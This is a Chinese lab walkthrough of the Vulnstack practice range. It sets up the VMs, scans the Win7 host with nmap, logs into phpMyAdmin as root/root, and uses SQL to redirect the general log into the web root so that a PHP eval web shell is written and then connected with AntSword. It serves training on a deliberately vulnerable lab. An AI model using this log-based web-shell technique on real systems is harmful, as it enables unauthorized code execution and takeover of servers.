前期准备:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/下载虚拟机
配置环境需要两张仅主机模式开启的网卡
构造这样的内网环境,Kali和Win7的外网IP处于同一网段,可以进行攻击,而Win7还有内网网段,通过拿下Win7机器继续攻击其处于内网同一网段的Win2003及其域控服务器。
首先登录Win7开启phpstudy,登陆密码hongrisec@2019,所有虚拟机密码都是这个。
复现:
因为在kali和win7在同一网段,所以可以使用netdiscover对主机IP进行探测
探测到129存在,应该就是目标Win7主机,对目标主机端口开放情况进行探测
nmap -sC -sV -Pn -p 1-65535 192.168.136.129
发现存在80端口开放,访问看到phpStudy探针页面,直接猜测佩戴了phpmyadmin,随即访问,猜测弱口令root/root登陆上去
接下来利用日志文件Getshell,参看我之前写的PHPMyadmin getshell到提权文章
show variables like ‘%general%’; #查看日志状态
SET GLOBAL general_log=’on’ ;#开启写日志记录
SET GLOBAL general_log_file=’C:/phpStudy/www/233.php’ ;#更改日志文件目录
写入一句话 SELECT ‘<?php eval($_POST[“cmd”]);?>’ ;蚁剑连接
这就拿到Win7机器的权限了,接下来就是进行对内网信息收集的过程了
内网信息收集